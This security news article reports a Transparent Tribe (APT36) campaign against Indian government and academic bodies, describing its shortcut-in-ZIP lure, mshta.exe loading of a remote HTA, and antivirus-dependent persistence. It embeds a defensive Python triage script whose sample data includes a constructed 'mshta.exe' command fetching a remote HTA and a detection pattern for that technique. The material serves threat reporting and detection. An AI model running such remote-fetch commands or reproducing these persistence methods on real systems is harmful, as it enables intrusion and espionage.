
Transparent Tribe’s New RAT Attacks Target Indian Government and Academia

The hacker group known as Transparent Tribe has launched a new series of attacks targeting Indian government and academic institutions, utilizing a remote access trojan (RAT) to maintain persistent control over compromised machines.

According to a report by CYFIRMA, the attacks are sophisticated and rely on deceptive delivery methods: the attackers send emails containing a ZIP file in which a Windows shortcut (LNK) file is disguised as a legitimate PDF document, with the genuine PDF content embedded to minimize user suspicion.

Also known as APT36, Transparent Tribe has been active in cyber espionage against Indian organizations since at least 2013. It continually adapts its toolkit and has used a succession of RATs over the years, including CapraRAT, Crimson RAT, ElizaRAT, and DeskRAT. The latest attacks begin with spear-phishing emails carrying a ZIP file that contains a malicious LNK file. When opened, the shortcut runs a remote HTML Application (HTA) script via "mshta.exe," which decrypts and loads the RAT payload directly into memory while displaying a decoy PDF document so that the user sees nothing out of the ordinary.

One notable feature of the malware is its capability to adjust its persistence methods based on the antivirus software detected on the infected system. For instance:

  • If Kaspersky is identified, it establishes persistence by creating a working directory and dropping an obfuscated HTA file into the Windows Startup folder.
  • If Quick Heal is detected, it uses a batch file and a malicious LNK file in the Startup folder for persistence.
  • For Avast, AVG, or Avira, it directly copies the payload into the Startup directory.
  • In the absence of recognized antivirus solutions, it resorts to a combination of batch file execution and registry manipulation for maintaining persistence.
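The delivery chain (a PDF-looking LNK inside a mailed ZIP, followed by mshta.exe fetching a remote HTA) and the Startup-folder persistence variants listed above each leave artifacts a defender can check for. The following Python triage script is an added example, not code from the CYFIRMA report or from this article: it flags ZIP members that are shortcuts dressed up as documents, flags process-creation records in which mshta.exe is launched with a remote URL, and lists Startup-folder entries whose type matches the described persistence methods. The archive contents, the process-event lines (using the documentation address 203.0.113.10), the file names and the set of document extensions are all constructed for the demonstration; the page itself names only the PDF disguise.

```python
import io
import os
import re
import tempfile
import zipfile
from pathlib import Path

# Document extensions a shortcut lure commonly borrows. Constructed list: the
# article itself only describes a PDF disguise.
DOCUMENT_EXTENSIONS = {".pdf", ".doc", ".docx", ".xls", ".xlsx"}

# Raw ShellLink header: HeaderSize is always 0x0000004C (little-endian).
LNK_HEADER = b"\x4c\x00\x00\x00"

# Item types in the Startup folder that the described persistence variants
# use (HTA, LNK, batch). Legitimate software also drops .lnk files here, so
# these are review candidates, not automatic verdicts.
STARTUP_RISKY = {".hta", ".lnk", ".bat", ".cmd"}

# mshta.exe launched with a remote http(s) URL, as in the HTA stage described.
MSHTA_REMOTE = re.compile(r"mshta(?:\.exe)?\b.*\bhttps?://", re.IGNORECASE)


def suspicious_lnk_entries(zip_bytes: bytes) -> list:
    """Return ZIP members that are Windows shortcuts dressed up as documents.

    A member is flagged when its name carries a document extension followed
    by .lnk (e.g. report.pdf.lnk), or when its bytes start with the ShellLink
    header regardless of the name (a shortcut in a mailed archive is itself
    unusual).
    """
    flagged = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            lower = info.filename.lower()
            stem, ext = os.path.splitext(lower)
            inner_ext = os.path.splitext(stem)[1]
            double_ext = ext == ".lnk" and inner_ext in DOCUMENT_EXTENSIONS
            with zf.open(info) as fh:
                header = fh.read(4)
            if double_ext or header == LNK_HEADER:
                flagged.append(info.filename)
    return flagged


def flag_mshta_remote(process_events) -> list:
    """Return process-creation records in which mshta.exe fetches a remote HTA."""
    return [line for line in process_events if MSHTA_REMOTE.search(line)]


def risky_startup_items(startup_dir: str) -> list:
    """List Startup-folder entries whose type matches the persistence variants."""
    return sorted(
        name for name in os.listdir(startup_dir)
        if os.path.splitext(name)[1].lower() in STARTUP_RISKY
    )


def build_sample_zip() -> bytes:
    """Constructed lure archive: a PDF-looking shortcut plus a benign text file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Advisory.pdf.lnk", LNK_HEADER + b"\x00" * 72)
        zf.writestr("readme.txt", b"constructed benign content")
    return buf.getvalue()


# Constructed process-creation records; 203.0.113.10 is a documentation address.
SAMPLE_PROCESS_EVENTS = [
    'parent=explorer.exe image=C:\\Windows\\System32\\mshta.exe cmdline="mshta.exe http://203.0.113.10/update.hta"',
    'parent=explorer.exe image=C:\\Windows\\System32\\notepad.exe cmdline="notepad.exe notes.txt"',
    'parent=cmd.exe image=C:\\Windows\\System32\\mshta.exe cmdline="mshta.exe C:\\Tools\\local.hta"',
]


def demo_startup_scan() -> list:
    """Build a throwaway Startup folder with constructed file names and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        for name in ("OneDrive.lnk", "upd.hta", "sync.bat", "desktop.ini"):
            Path(tmp, name).touch()
        return risky_startup_items(tmp)


if __name__ == "__main__":
    print("lure shortcuts:", suspicious_lnk_entries(build_sample_zip()))
    print("remote mshta:", flag_mshta_remote(SAMPLE_PROCESS_EVENTS))
    print("startup items:", demo_startup_scan())
```

On a real host, point `risky_startup_items` at the per-user and all-users Startup folders and feed `flag_mshta_remote` process-creation telemetry from your EDR or Sysmon pipeline; the ZIP check belongs at the mail gateway, before the archive reaches a user. A local HTA path (third sample event) is deliberately not flagged, since only the remote-fetch pattern matches the chain described here.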

Additionally, the HTA file includes a DLL named "iinneldc.dll," which functions as a fully-featured RAT, providing remote system control, file management, data exfiltration, and more.

APT36 remains a determined and strategic cyber-espionage threat, focused on intelligence collection from Indian government and educational institutions.

In recent weeks, APT36 has also been linked to another campaign that utilized a malicious shortcut file disguised as a government advisory PDF to drop a .NET-based loader, which facilitated further execution of malware and maintained long-term control over the target systems.

The shortcut executes a command that retrieves an MSI installer from a remote server, initiating actions that include displaying a decoy PDF, storing additional DLL files, and establishing persistence through registry modifications.

As the landscape of cyber threats continues to evolve, Transparent Tribe shows no signs of slowing down, leveraging advanced techniques to carry out its espionage activities against Indian targets.
